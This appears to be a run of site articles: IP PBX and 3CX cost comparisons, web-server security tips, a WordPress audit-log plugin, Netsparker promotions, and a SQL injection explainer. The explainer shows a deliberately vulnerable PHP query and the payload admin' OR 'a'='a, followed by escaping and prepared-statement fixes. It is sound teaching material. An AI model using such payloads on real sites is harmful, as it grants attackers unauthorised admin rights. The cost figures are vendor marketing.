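// Rough SIP trunk bandwidth estimate: codec payload bitrate plus ~23.2Kbps
// of IP overhead per call, multiplied by the number of simultaneous calls.
$codecs = [
    'G.711' => 64.0 + 23.2, // ~87.2 Kbps per call
    'G.729' => 8.0  + 23.2, // ~31.2 Kbps per call
];

$simultaneousCalls = 24;

foreach ($codecs as $name => $kbpsPerCall) {
    $totalKbps = $kbpsPerCall * $simultaneousCalls;
    printf("%s: %.1f Kbps x %d calls = %.1f Kbps (%.2f Mbps)\n",
        $name, $kbpsPerCall, $simultaneousCalls, $totalKbps, $totalKbps / 1024);
}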

Voicemail with IP PBXs

Voicemail works differently to how it does in a traditional phone environment, where the voicemail server was typically a standalone unit or an add-in card. In IP PBX systems, voicemail is integrated into the solution and stored in a digital format. This has several advantages, including the ability to access voicemail via a web browser or mobile phone, forward voicemails to an email account, forward a voicemail to multiple recipients via email and many more.

In addition, some IP PBXs can be configured to automatically call the person for whom a voicemail was left and play back any messages in their mailbox.

How an IP PBX Can Help Save Money

Once you understand the fundamental differences between an IP PBX and legacy analogue/digital PBXs, it becomes clearer how an organization can save.

Because an IP PBX runs on the existing network infrastructure, there’s no need for separate cabling. This negates a significant chunk of the setup costs, as does the simplicity of installation. The initial investment can be up to ten times less than traditional PSTN systems, and it means a huge reduction in service costs. The absence of separate physical wiring also means there is no dedicated cable plant that can be damaged and that is costly to repair and maintain. Moving between offices is now an easy task, as no cable patching is required from the IP PBX to the IP phone. All that’s required is a data port to connect the IP phone, or an access point in the case of a wireless client (laptop, mobile device) with a softphone.

Maintenance of the underlying systems is also far easier. Most IP PBX systems run on either Linux or Windows, systems that technicians are usually intimately familiar with. This means technical problems often don’t need to be outsourced. When a patch or upgrade is available from the vendor, the administrator can quickly create a snapshot of the IP PBX system via the virtualization environment and proceed with the installation. In the unlikely event the system doesn’t behave as expected, the administrator can roll back to the system’s previous state with the click of a button.

Upgrading the IP PBX to further extend its functionality is far more cost and time efficient compared to older PBXs. In most cases, new features are just a matter of purchasing an add-on or plugin and installing it. This scalability extends to the reach of the system itself. Traditional phone systems only have a certain number of ports that phones can be connected to. Once you reach that limit it will cost a significant amount to replace the existing system. With IP PBX, this isn’t an issue. IP phones connect via the network and aren’t limited by the same kind of physical factors.

As already noted, some IP PBX providers support running on a virtual platform. 3CX is one of the most popular and stable solutions that officially supports both Hyper-V and VMware. This functionality means you can create low-cost backups of the system.

The savings are even more prominent when you consider the price of VoIP compared to traditional PBX. SIP trunking can result in huge monthly savings of around 40%, depending on usage. If the business regularly makes calls abroad, there’s room for even more savings as it won’t be subject to hefty international fees.

The 3CX Management Console is packed with functionality, settings, call analysis and monitoring (click to enlarge)

Furthermore, extending the maximum number of simultaneous calls on a SIP trunk is an easy process, usually requiring only changes to the SIP account and additional bandwidth toward the SIP provider. These changes can generally be made in a few days. With traditional ISDN or PSTN lines the organization would need to order the additional lines from the telco and wait up to a few weeks to have the new lines physically installed. Then there is the additional monthly service fee charged by the telco regardless of the new lines’ usage. Most of these costs do not exist with SIP providers and SIP trunks, making them a much cheaper and faster solution. Most US, UK and Australian telco providers are now moving from ISDN to SIP trunking, making it only a matter of time until ISDN is no longer offered as standard.

Companies can also choose to use codecs such as G.729 instead of G.711 with their SIP provider, sacrificing some voice quality to reduce their SIP trunking bandwidth requirements by roughly 64% (from 87.2Kbps to 31.2Kbps per call). For example, a SIP trunk using the G.711 codec and supporting up to 24 simultaneous calls requires 87.2Kbps x 24 = 2092.8Kbps of bandwidth, or 2.043Mbps at full line capacity.

ISDN T1 Bandwidth requirements - G.711 vs G.729

With G.729 the same SIP trunk would require 31.2Kbps x 24 = 748.8Kbps of bandwidth or 0.73Mbps during full line capacity!

In addition to these direct savings, the advanced features offered by IP PBXs and their flexibility can result in a huge increase in productivity. The ability to communicate efficiently with colleagues and customers often results in higher satisfaction, increased work output and more profit.

All of this adds up to some huge cost savings, with estimates of up to 80% over an extended period. Not only are IP PBX systems cheaper to set up, they’re cheaper to maintain, upgrade, scale and remove.

Free IP PBXs vs Paid

It’s often tempting to cut costs further by opting for a free IP PBX solution. However, these often lack the support and features of a paid alternative. Most providers put a limit on outgoing calls; however, the absence of important VoIP and Unified Communications features is usually the main problem, severely limiting the system’s functionality. Solutions such as 3CX offer full product functionality with up to 8 simultaneous calls at no cost, making them ideal VoIP systems for startups and small companies.

The security of some free providers has been brought into question. Asterisk has been hacked on several occasions, though security has been hardened significantly now. Though no system is completely secure, paid providers often have dedicated security teams and ensure systems are hard to penetrate by default, rather than requiring extra configuration or expertise that the end customer might not have.

Low-cost editions come with a multitude of other features. Application integration is a big one: 3CX’s Pro plan offers integration with Outlook, Salesforce, Microsoft Dynamics, Sugar CRM, Google Contacts and more.

Paid editions are also a must for unified communications features such as video calls, conferencing and integrated fax servers. The number of participants that can join a conference call is also higher with subscription-based versions of 3CX.

These advanced features extend to calls, with inbuilt support for call recording, queuing and parking. 3CX even offers a management suite for call recordings, saving the need to set up additional software. In paid versions, functionality like this is more likely to extend to Android, iOS, and other platforms.

However, perhaps the most important advantage is the amount of support offered by subscription-based services. Higher profits mean they can offer prompt, dedicated support, against the often slow and limited services of free providers. Though a paid service isn’t always essential, the extra productivity and support they bring is usually well worth the price – especially when considering the negative impact a technical IP telephony issue can have on the organization.

Popular Free/Low-Cost IP PBX Solutions

That said, small businesses can probably get away with a free IP PBX solution. There are reputable, open-source solutions out there completely free of charge. The biggest, most popular one is Asterisk. The toolkit has been going for years, and has a growing list of features that begins to close the gap between free and subscription-based versions.

Asterisk supports interactive voice menus, voicemail, automatic call distribution and conference calling. It’s still a way off premium services for many of the reasons above, but it’s about as good as it gets without shelling out.

Despite that, there are still some notable competitors. Many of them started as branches of Asterisk, which tends to happen in the open source community. Elastix is one of these and provides unified communications server software with email, IM, IP PBX, collaboration and faxing. The interface is a bit simpler than its progenitor’s, and it pulls in other open source projects such as Openfire, HylaFax and Postfix to offer a more well-rounded feature line-up.

SIP Foundry, on the other hand, isn’t based on Asterisk and is about as direct a competitor as there can be. Its feature list is much the same as Asterisk’s, but it is marketed more towards businesses looking to build their own bespoke system. That’s where SIP Foundry’s business model comes in, selling support to companies for a substantial US$495 per month for 100 users.

Other open source software has a focus on security. Kamailio has been around for over fifteen years and supports asynchronous TCP, UDP and TLS to secure VoIP video, text and WebRTC. This combines with authentication and authorization as well as load balancing and routing fail-over to deliver a very secure experience. The caveat is that Kamailio can be more difficult to configure, and admins need considerable knowledge of SIP.

Then there’s 3CX. The company provides a well-featured free experience that has more than enough to get someone started with IP PBX. All the essential features are there, from call logging, to voicemail, to one-click conferencing. However, 3CX also offers more for those who want it, including some very powerful tools. The paid versions of 3CX are still affordable, but offer the same features of some of the most expensive solutions on the market. It offers almost unprecedented application integration and smart call centre abilities at a reasonable price.

3CX also supports a huge range of IP phones, VoIP Gateways, and any SIP Trunk provider. The company works with a huge list of providers across the world to create pre-configured SIP Trunk templates for a plug and play setup. These templates are updated and tested with every single release, ensuring the user has a problem-free experience. What’s more, powerful, intuitive softphone technology is built straight into the switchboard, including drag and drop calls, incoming call management, and more.

Unified Communications features include mobility clients with advanced messaging and presence features that allow you to see if another user is available, on a call or busy. Click-to-call features can be embedded in the organization’s website, allowing visitors to call the company with the click of a button through their web browser. Advanced Unified Communications features such as 3CX WebMeeting enable video calling directly from your organization’s website, so visitors can initiate a video call to your sales team with the click of a button.

3CX WebMeeting enables clientless video conferencing/presentation from any web browser

Employees can also use 3CX WebMeeting to communicate with colleagues in different physical locations and deliver presentations, sharing videos, PowerPoint presentations, Word documents, Excel spreadsheets, their desktop or any other application. Many of these features are not even offered in larger high-end enterprise solutions, or would cost thousands of dollars to purchase and maintain.

3CX has also introduced VoIP services and functionality suitable for hotels making their system an ideal Hotel-Based VoIP system.

Downloading the free 3CX IP PBX system is well worth the time and effort for organizations seeking to replace or upgrade their PBX system at minimal or no cost.

Summary

IP PBXs offer so many advantages over traditional PBXs that implementation is close to a no-brainer. An IP PBX is cheaper in almost every way, while still providing advanced features that just aren’t possible with other systems. The ability to intelligently manage incoming and outgoing calls, create conference calls on the fly and work from home thanks to advanced mobility features is almost essential in this day and age. Add to that the greatly reduced time and resources needed to upgrade, and you have a versatile, expandable system which won’t fall behind the competition.

Though some of these benefits can be had with completely free IP PBX solutions, paid services often come with tools that can speed up workflow and management considerably. The returns gained from integration of Microsoft Dynamics, Office 365, Salesforce and Sugar CRM are often well worth the extra cost.

However, such functionality doesn’t have to be expensive. Low-cost solutions like 3CX offer incredible value for money and plans that can be consistently upgraded to meet growing needs. The company lets you scale from a completely free version to a paid one, making it one of the best matches out there for any business size.


7 Security Tips to Protect Your Websites & Web Server From Hackers

Recent and continuous website security breaches at large organizations, federal government agencies, banks and thousands of companies worldwide have once again verified the importance of website and web application security to prevent hackers from gaining access to sensitive data while keeping corporate websites as safe as possible. Many encounter a lot of problems when it comes to web application security, though; it is a pretty heavy field to dig into.

Some security professionals would not be able to provide all the necessary steps and precautions to deter malicious users from abusing your web application. Many web developers will encounter some form of difficulty while attempting to secure their website, which is understandable since web application security is a multi-faceted concept, where an attacker could make use of thousands of different exploits that could be present on your website.

Although no single list of web security tips and tricks can be considered complete (in fact, one of the tips is that the amount of knowledge, information and precautions that you can implement is never enough), the following is as close as you can get. We have listed seven concepts and practices to aid you in securing your website which, as we already mentioned, is anything but straightforward. These points will get you started and nudge you in the right direction, bearing in mind that some factors in web application security are a higher priority to secure than others.

1. Hosting Options

Without web hosting services most websites would not exist. The most popular methods of hosting web applications are: dedicated hosting, where your web application is hosted on a dedicated server intended for your website only, and shared hosting, where you share a web server with other users who in turn run their own web applications on the same server.

There are multiple benefits to using shared hosting. Mainly, this option is cheaper than having your own dedicated server, which generally attracts smaller companies to shared hosting space. From a functionality point of view the difference between shared and dedicated hosting may seem irrelevant, since the website will still run; when discussing security, however, we need to look at it from a completely different perspective.

The downside of shared hosting trumps any advantages that it may offer. Since the web server is being shared between multiple web applications, any attacks will also be shared between them. For example, if you share your web server with an organisation that has been targeted by attackers who have launched Denial of Service attacks on its website, your web application will also be affected since it is being hosted on the same server while using resources from the same resource pool. Meanwhile, the absence of complete control over the web server itself will allow the provider to take certain decisions that may place your web application at risk of being exploited. If one of the websites being hosted on the shared server is vulnerable, there is a chance that all the other websites and the web server itself could be exploited. Read more about web server security.

2. Performing Code Reviews

Most successful attacks against web applications are due to insecure code rather than the underlying platform itself. Case in point: SQL Injection attacks are still the most common type of attack even though the vulnerability itself has been known for roughly two decades. This vulnerability does not occur due to incorrect input handling by the database system itself; it is entirely related to the fact that input sanitization is not implemented by the developer, which leads to untrusted input being processed without any filtering.

This approach only applies for injection attacks and, normally, inspecting code would not be this straightforward. If you are making use of a pre-built application, updating to the latest version would ensure that your web application does not contain insecure code, although if you are using custom built apps, an in depth code review by your development team will be required. Whichever application type you are using, securing your code is a critical step or else the very base of the web application will be flawed and therefore vulnerable.

3. Keeping Software Up To Date

When using software that has been developed by a third party, the best way to ensure that the code is secure is to apply the latest updates. A simple web application will make use of numerous components that can lead to successful attacks if left unpatched. For example, both PHP and MySQL have been vulnerable to exploits at points in time and were later patched, and a default Linux web server installation includes multiple services, all of which need to be updated regularly to avoid vulnerable builds of software being exploited.

The importance of updating can be seen from the Heartbleed exploit discovered in OpenSSL, which is used by most web applications that serve their content via HTTPS. That being said, patching these vulnerabilities is an easy task once the appropriate patch has been released: you simply need to update your software. This process will be different for every operating system or service although, just as an example of how easy it is, updating services on Debian-based servers only requires you to run a couple of commands.

4. Defending From Unauthorised Intrusions

While updating software will ensure that no known vulnerabilities are present on your system, there may still be entry points, missed by our previous tips, through which an attacker can access your system. This is where firewalls come into play. A firewall is necessary as it limits traffic depending on your configuration, and one can be found on most operating systems by default.

That being said, a firewall will only be able to analyse network traffic, which is why implementing a Web Application Firewall is a must if you are hosting a web application. WAFs are best suited to identifying malicious requests that are being sent to a web server. If the WAF identifies an SQL Injection payload in a request it will drop that request before it reaches the web server. Meanwhile if a WAF is not able to intercept these requests, you may also set up custom rules depending on the requests that need to be blocked. If you are wondering which requests you can block even before your WAF can, take a look at our next tip.

5. Performing Web Vulnerability Scans

No amount of code reviews and updates can ensure that the end product is not vulnerable and cannot be exploited. Code reviews are limited since the executed code is not being analysed, which is why web vulnerability scanning is essential. Web scanners view the web application as a black box, analysing the finished product in a way that is not possible with white-box scanning or code reviews. Meanwhile, some scanners also provide the option to perform grey-box scanning, by combining website scans with a backend agent that can analyse code.

As complex and large as web applications are nowadays, it would be easy to miss certain vulnerabilities while performing a manual penetration test. Web vulnerability scanners will automate this process for you, thereby being able to cover a larger website in less time, while being able to detect most known vulnerabilities. One notorious vulnerability that is difficult to identify is DOM-based XSS, although web scanners are still able to identify such vulnerabilities. Web vulnerability scanners will also provide you with requests that you need to block on your Web Application Firewall (WAF), while you are working to fix these vulnerabilities.

6. Importance Of Monitoring

It is imperative to know if your web application has been subjected to an attack. Monitoring the web application, and the server hosting it, is the best way to ensure that even if an attacker gets past your defence systems, at least you will know how, when and from where it happened. There may be cases when a website is brought offline due to an attack and the owner does not even know about the incident until precious time has passed.

To avoid this you can monitor server logs, for example enabling notifications to be triggered when a file is deleted or modified. This way, if you had not modified that particular file, you will know that someone else has unauthorised access to your server. You can also monitor uptime, which comes in handy when the attack is not as stealthy as modifying files, such as when your web server is subject to a Denial of Service attack. Such utilities will notify you as soon as your website is down, without you having to discover the incident from the users of your website.
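
As a minimal sketch of the file-change idea (not a substitute for a dedicated monitoring service), a PHP script like the following could be scheduled via cron to hash every file under the web root and flag anything added, modified or deleted since the last run; the paths and notification address below are hypothetical:

<?php
// Minimal file-integrity check: compare current file hashes under a web root
// against a stored baseline and report anything added, changed or deleted.
// The web root, baseline path and email address are hypothetical placeholders.
$webRoot  = '/var/www/html';
$baseline = '/var/integrity/baseline.json';
$notifyTo = 'admin@example.com';

$current  = [];
$iterator = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($webRoot, FilesystemIterator::SKIP_DOTS)
);
foreach ($iterator as $file) {
    if ($file->isFile()) {
        $current[$file->getPathname()] = md5_file($file->getPathname());
    }
}

$previous = file_exists($baseline) ? json_decode(file_get_contents($baseline), true) : [];
$changes  = [];

foreach ($current as $path => $hash) {
    if (!isset($previous[$path])) {
        $changes[] = "ADDED:    $path";
    } elseif ($previous[$path] !== $hash) {
        $changes[] = "MODIFIED: $path";
    }
}
foreach (array_diff_key($previous, $current) as $path => $hash) {
    $changes[] = "DELETED:  $path";
}

if (!empty($previous) && !empty($changes)) {
    mail($notifyTo, 'File integrity alert', implode("\n", $changes)); // send the alert
}

file_put_contents($baseline, json_encode($current)); // store the new baseline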

The worst thing you can do when implementing monitoring services is to base them on the same web server that is being monitored. If that server were knocked offline, the monitoring service would not be available to notify you.

7. Never Stop Learning

Finally, whatever you currently know about web security, it’s never enough. Never stop learning about improving your web application’s security, because literally every day brings a new exploit that may be used against your website. Zero-day attacks happen out of the blue, which is why keeping yourself updated with any new security measures you can implement is imperative. You can find such information on the many web security blogs that detail how a website administrator should enforce their website’s security.


WordPress Audit Trail: Monitor Changes & Security Alerts For WordPress Blogs, Websites, e-Shops - Regulatory Compliance

Monitoring, auditing and obtaining security alerts for websites and blogs based on popular CMS systems such as WordPress have become a necessity. Bugs, security exploits and security holes are continuously being discovered for every WordPress version, making monitoring and auditing a high security priority. In addition, multi-user environments are often used for large WordPress websites, making it equally important to monitor WordPress user activity.

Users with different privileges can log in to the website’s admin pages and publish content, install a plugin to add new functionality to the website, or change a WordPress theme to alter the look and feel of the website. From the admin pages of WordPress, users can do anything their privileges allow, including taking down the website for maintenance.

The Need to Keep a Log of What is Happening on Your WordPress

Every type of multi-user software keeps an audit trail that records all user activity on the system. And, since modern business websites have become fully blown multi-user web applications, keeping a WordPress audit trail is a critical, must-do task. A default installation of WordPress does not have an audit trail, but the good news is that there are plugins such as WP Security Audit Log that allow you to keep an audit trail of everything that is happening on your WordPress.

Figure 1. Plugins like WP Security Audit Log provide detailed tracking of all necessary events (click to enlarge)

There are several advantages to keeping track of all the changes that take place on your WordPress website in an audit trail. Here are just a few:

Keep Track Of Content & Functionality Changes On Your WordPress

By keeping a WordPress audit trail you can find out who did what on your WordPress website: for example, who published an article, modified existing and already-published content of an article or page, installed a plugin, changed the theme or modified the source code of a file.

Figure 2. Searching for specific events in WordPress Security Audit Log (click to enlarge)

Be Alerted to Suspicious Activity on Your WordPress

By keeping a WordPress audit trail you can also be alerted to suspicious activity on your WordPress at an early stage, thus thwarting possible hack attacks. For example, when a WordPress site is hacked, the attackers typically reset a user’s password or create a new account to log in to WordPress. By using an add-on such as Email Notifications you can create specific rules so that when important changes happen on your WordPress they are logged and you are notified via email.

Figure 3. WP Security Audit Log: Creating customized email alerts for your WordPress site

Ensure the Productivity of Your Users & Employees

Nowadays many businesses employ remote workers. As much as businesses benefit by employing remote workers, there are disadvantages. For example, while the activity of employees who work from the office can be easily tracked, that of remote workers cannot. Therefore if your business website is powered by WordPress, when you install a WordPress audit trail plugin you can keep track of everything your web team is doing on the website, including the login and logout times, and location.

Ensure Your Business WordPress Websites Meet Mandatory Regulatory Compliance Requirements

If you have an online business, or if you do any sort of business via your WordPress website, there are a number of regulatory compliance requirements your website needs to adhere to, such as PCI DSS. One common requirement among them is logging: as a website owner you should keep a log, or audit trail, of all the activity that is happening on your website.

Ease WordPress Troubleshooting

If you already have experience managing a multi-user system, you know that if something breaks down users will never tell you what they did. This is common, especially when administering customers’ websites. The customer has administrative access to WordPress. Someone installs a plugin, the website goes haywire yet it is no one’s fault. By keeping a WordPress audit trail you can refer to it and easily track any website changes that took place, thus making troubleshooting really easy.

Keep A WordPress Audit Trail

There are several other advantages to keeping a WordPress audit trail of all the changes that take place on your WordPress site, such as the ability to generate reports to justify your charges. The list of advantages can be endless, but the most important one is security. Typically overlooked, logging also helps you ensure the long-term security of your WordPress website.

 


Understanding SQL Injection Attacks & How They Work. Identify SQL Injection Code & PHP Caveats

SQL Injections have been keeping security experts busy for over a decade now as they continue to be one of the most common types of attack against web servers, websites and web application servers. In this article, we explain what a SQL injection is, show you SQL injection examples and analyse how these types of attack manage to exploit web applications and web servers, providing hackers access to sensitive data.


What Is A SQL Injection?

Websites typically operate with two sides to them: the frontend and the backend. The frontend is the element we see: the rendered HTML, images, and so forth. On the backend, however, there are layers upon layers of systems rendering the elements for the frontend. One such layer, the database, most commonly uses a database language called SQL, or Structured Query Language. This standardized language provides a logical, human-readable sentence to perform definition, manipulation, or control instructions on relational data in tabular form. The problem, however, is that while this provides a structure for human readability, it also opens up a major problem for security.

Typically, when data is provided from the frontend to the backend of a website – e.g. an HTML form with username and password fields – this data is inserted into the sentence of a SQL query. Rather than being assigned to some object or passed via a set() function, the data has to be concatenated into the middle of a string, much as you would print a concatenated string of debug text and a variable’s value. The problem is that the database server, such as MySQL or PostgreSQL, must be able to lexically analyse and understand the sentence’s grammar and parse variable=value definitions, so certain specific requirements must be met, such as wrapping string values in quotes. A SQL injection vulnerability, therefore, is where unsanitized frontend data, such as quotation marks, can disrupt the intended sentence of a SQL query.

How Does A SQL Injection Work?

So what does “disrupt the intended sentence of a SQL query” mean? A SQL query reads like an English sentence:

Take variable foo and set it to ‘bar’ in table foobar.

Notice the single-quotes around the intended value, bar. But if we take that value, add a single quote and some additional text, we can disrupt the intended sentence, creating two sentences that change the entire effect. So long as the database server can lexically understand the sentence, it is none the wiser and will happily complete its task.  So what would this look like?

If we take that value bar and change it to something more complex – bar’ in table foobar. Delete all values not equal to ‘ – it completely disrupts everything. The sentence is thus changed as follows:

Take variable foo and set it to ‘bar’ in table foobar. Delete all values not equal to ‘’ in table foobar.

Notice how dramatically this disrupts the intended sentence? By injecting additional information, including syntax, into the sentence, the entire intended function and result has been disrupted to effectively delete everything in the table, rather than just change a value.

What Does A SQL Injection Look Like?

In code form, a SQL injection can find itself in effectively any place a SQL query can be altered by the user of a web application. This means things like query strings e.g: example.com/?this=query_string, form content (such as a comments section on a blog or even a username & password input fields on a login page), cookie values, HTTP headers (e.g. X-FORWARDED-FOR), or practically anything else.  For this example, consider a simple query string in PHP:

Request URI: /?username=admin
 
1.  $user = $_GET['username'];
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

First, we will break this down a bit.

On line #1, we set the value of the username field in the query string to the variable $user.

On line #2, we insert that variable’s value into the SQL query’s sentence. Substituting the value admin from the URI for the variable, the database query would ultimately be parsed as follows by MySQL:

UPDATE tbl_users SET admin=1 WHERE username='admin'

However, a lack of basic sanitization opens this query string up to serious consequences. All an attacker must do is put a single quote character in the username query string field in order to alter this sentence and inject whatever additional data he or she would like.

Here is an example of what this would look like:

Request URI: /?username=admin' OR 'a'='a
 
1.  $user = $_GET['username'];
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

Now, with this altered data, here is what MySQL would see and attempt to evaluate:

UPDATE tbl_users SET admin=1 WHERE username='admin' OR 'a'='a'

Notice, now, that if the letter A equals the letter A (basically true=true), all users will be set to admin status.

Ensuring Code is Not Vulnerable to SQL Injection Vulnerabilities

If we were to add a function, mysql_real_escape_string() for example, on line #1, that would prevent this particular variable from being vulnerable to a SQL injection. In practice, it would look like this:

Request URI: /?username=admin' OR 'a'='a

1.  $user = mysql_real_escape_string($_GET['username']);
2.  mysql_query("UPDATE tbl_users SET admin=1 WHERE username='$user'");

This function escapes certain characters dangerous to MySQL queries, by prefixing those characters with backslashes. Rather than evaluate the single quote character literally, MySQL understands this prefixing backslash to mean do not evaluate the single quote. Instead, MySQL treats it as part of the whole value and keeps going.  The string, to MySQL, would therefore look like this:


UPDATE tbl_users SET admin=1 WHERE username='admin\' OR \'a\'=\'a'

Because each single quote is escaped, MySQL considers it part of the whole username value, rather than evaluating it as multiple components of the SQL syntax. The SQL injection is thus avoided, and the intention of the SQL sentence is thus undisrupted.

Caveat: For these examples, we used older, deprecated functions like mysql_query() and mysql_real_escape_string() for two reasons:

1.    Most PHP code still actively running on websites uses these deprecated functions;
2.    It allows us to provide simple examples easier for users to understand.

However, the right way to do it is to use prepared SQL statements. For example, the prepare() functions of the MySQLi and PDO_MySQL PHP extensions allow you to format and assemble a SQL statement using directive symbols very much like a sprintf() function does. This prevents any possibility of user input injecting additional SQL syntax into a database query, as all input provided during the execution phase of a prepared statement is sanitized.  Of course, this all assumes you are using PHP, but the idea still applies to any other web language.
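
For illustration, here is a short sketch of the prepared-statement approach using PDO_MySQL; it reuses the hypothetical table and column names from the earlier examples, and the DSN and credentials are illustrative only:

<?php
// Prepared-statement version of the earlier example using PDO_MySQL.
// The DSN, credentials, table and column names are illustrative only.
$pdo = new PDO('mysql:host=localhost;dbname=example_db', 'db_user', 'db_pass');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

$user = isset($_GET['username']) ? $_GET['username'] : '';

// The :username placeholder is bound separately from the SQL sentence, so a
// value such as  admin' OR 'a'='a  is treated purely as data, never as syntax.
$stmt = $pdo->prepare('UPDATE tbl_users SET admin=1 WHERE username = :username');
$stmt->bindValue(':username', $user, PDO::PARAM_STR);
$stmt->execute();

echo $stmt->rowCount() . " row(s) updated\n";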

SQL Injection Is The Most Widely Exploited Vulnerability

Even though it has been more than sixteen years since the first documented SQL Injection attack, it is still a very popular vulnerability with attackers and is widely exploited. In fact, injection flaws have consistently ranked at the top of the OWASP Top 10 list of most exploited vulnerabilities.


Web Application Security Interview on Security Weekly – Importance of Automated Web Application Security

A few weeks back Security Weekly interviewed Ferruh Mavituna, Netsparker’s CEO and Product Architect. Security Weekly is a popular podcast that provides free content on IT security news, vulnerabilities, hacking and research, and frequently interviews industry leaders such as John McAfee, Jack Daniel and Bruce Schneier.

During the 30-minute interview, Security Weekly’s host Paul Asadoorian and Ferruh Mavituna highlight how important it is to use an automated web application security scanner to find vulnerabilities in websites and web applications. They also briefly discuss web application firewalls and their effectiveness, and how Netsparker is helping organizations improve their post-scan process of fixing vulnerabilities with their online web application security scanner, Netsparker Cloud.

Paul and Ferruh covered several other aspects of web application security during this interview, so if you are a seasoned security professional, a developer or a newbie it is a recommended watch.  

To view the interview, click on the image below:

netsparker-ceo-interview-importance-of-automated-web-application-scanner
Figure 1. Netsparker CEO explains the importance of automated web application security scanners


WordPress DOM XSS Cross-site Scripting Vulnerability Identified By Netsparker

8th of May 2015: Netsparker announced yesterday the discovery of a critical security vulnerability contained in an HTML file found in many WordPress themes, including those on WordPress.org hosted websites. As reported by Netsparker, the specific HTML file is vulnerable to cross-site scripting attacks and session hijacking. WordPress.org has already issued an official announcement and patch (v4.2.2) and recommends WordPress administrators update their website files and themes.

The Genericons icon font package, which is used in a number of popular themes and plugins, contained an HTML file vulnerable to a cross-site scripting attack. All affected themes and plugins hosted on WordPress.org (including the Twenty Fifteen default theme) have been updated yesterday by the WordPress security team to address this issue by removing this nonessential file. To help protect other Genericons usage, WordPress 4.2.2 proactively scans the wp-content directory for this HTML file and removes it. Reported by Robert Abela of Netsparker.

By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session. This means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. As seen from the XSS example in Netsparker's article, if a web application is vulnerable to cross-site scripting and the administrator’s session is hijacked, the malicious hacker exploiting the vulnerability will have full admin privileges on that web application.



Choosing a Web Application Security Scanner - The Importance of Using the Right Security Tools

In the world of information security there exist many tools, from small open source products to full appliances, to secure a system, a network, or an entire corporate infrastructure.  Of course, everyone is familiar with the concept of a firewall – even movies like Swordfish and TV shows like NCIS have so very perfectly described, in riveting detail, what a firewall is.  But there are other, perhaps less sexy utilities in a security paradigm.

Various concepts and security practices – such as using complex passphrases, or eschewing passphrases entirely, deeply vetting email sources, safe surfing habits, etc. – are increasingly growing trends among the general workforce at large, especially with the ubiquity of computers at every desk.  But security in general is still unfortunately looked at as an afterthought, even when a lack thereof begets massive financial loss at a seemingly almost daily level.

Security engineers are all too often considered an unnecessary asset, simply a menial role anybody can do; a role that can be assumed as yet another hat worn by developers, system administrators, or, well, perhaps just someone who only shows a modest capability with Excel formulas.  Whatever the reason for such a decision, be it financial or otherwise, the consequences can be severe and long-lasting.  Sony underestimated the value of a strong and well-equipped security team multiple times, choosing to forego a powerful army in lieu of a smaller, less outfitted and thus thinner-stretched but cheaper alternative.  This, in turn, yielded some of the largest security breaches ever seen by a single corporation.  Were their security department better outfitted with the right tools, it is quite possible those events would have played out entirely differently.

Using The Right Security Tools

So, what constitutes “the right tools”?  Many things.  A well-populated team of capable security engineers certainly can be considered a valuable tool in building a strong security posture within an infrastructure.  But, more specifically and very critically, it is what assets those engineers have at their disposal that may mean the difference between a minor event that never even makes it outside the corporate headquarters doors, and a major event that results in a corporation paying for identity theft protection for millions of customers.  Those tools of course vary widely depending on the organization, but one common element they all do – or at least absolutely should – share is a web application security scanner.

What Is A Web Application Security Scanner?

A website that accepts user input in any form, be it URL values or submitted content, is a complex beast.  Not only does the content an end user provides change the dynamics of the website, but it even has the potential to cripple that website if done maliciously and left unprotected against.  For every possibility of user content, the amount of potential attack vectors increases on a magnitude of near infinity.  It is literally impossible for a security engineer, or even team thereof, to account for all these possibilities by hand and, especially, test them for known or unknown vulnerabilities.

Web scanners exist for this very purpose, designed carefully to predict potential and common methods of attack, then brute-force test them to find any possibility of an existing vulnerability.  And they do this at a speed impossible for humans to replicate manually.  This is crucial for many reasons, namely that it saves time, it is thorough and comprehensive, and, if designed well, adaptive and predictive to attempt clever methods that even the most skilled security engineer may not immediately think of.  Truly, not using a web security scanner is only inviting potentially irreparable harm to a web application and even the company behind it.  But the question remains: Which web scanner works the best?

Options Galore - How To Choose Which Web Scanner Is Right For You

Many websites and web applications are like human fingerprints, with no two being alike.  Of course, many websites may use a common backend engine – WordPress, an MVC framework like Laravel or Ruby on Rails, etc. – but the layers on top of those engines, such as plugins or custom-coded additions, are often a quite unique collection.

The backend engine is also not the only portion to be concerned with.  Frontend vulnerabilities may exist within each of these layers, such as cross-site scripting, insecurely implemented jQuery libraries and add-ons, poor sanitization of AJAX communication models, and many more.  Each layer presents another nearly endless array of input possibilities to test for vulnerabilities.

A web scanner needs to be capable of digging through these unique complexities and providing accurate, reliable findings.  False positives can waste an engineer’s time or, worse, send a development team on a useless chase, performing unit tests and looking for a falsely detected vulnerability.  And if the scanner is difficult to understand or provides little insight into the detected vulnerabilities, it makes for a challenging or undesirable utility that may go unused.  Indeed, a well-designed web security scanner that delivers on all fronts is an important necessity for a strong security posture and a better secured infrastructure.

Final Thoughts

There is no one perfect solution that will solve all problems and completely secure your website such that it becomes impenetrable.  Further, a web security scanner will only be as effective as the security engineers or developers fixing all flaws it finds.  A web security scanner is only the first of many, many steps, but it indeed is an absolutely critical one for a powerful security posture.

Indeed, we keep returning to that phrase – security posture – because it is a perfectly analogous way to look at web application, system, and infrastructure security for both what it provides and what is required for good posture: a strong backbone.  Focused visibility and a clear view of paths over obstructions is not possible with a slouched posture.  Nothing will provide that vision as clearly as a web security scanner will, and no backbone is complete without a competent and useful web security scanning solution at its top.


Comparing Netsparker Cloud-based and Desktop-based Security Software solutions – Which solution is best for you?

If you are reading this you have heard about Cloud Computing. If not, I would be worried! Terms such as Cloud Computing, Software as a Service and Cloud Storage have become a permanent fixture in adverts, marketing content and technical documentation.

Many Windows desktop software applications have moved to the “cloud”. However, even though the whole industry wants you and your data in the cloud, have you ever looked into the pros and cons of the cloud? Does it make sense to go in that direction?

Let’s use web application security scanners as an example: software that is used to automatically identify vulnerabilities and security flaws in websites and web applications. Most, if not all, of the industry-leading vendors have both a desktop edition and an online service offering. In fact, Netsparker just launched their all-new service offering, Netsparker Cloud, the online false-positive-free web application security scanner. In such a case, which one should you go for?

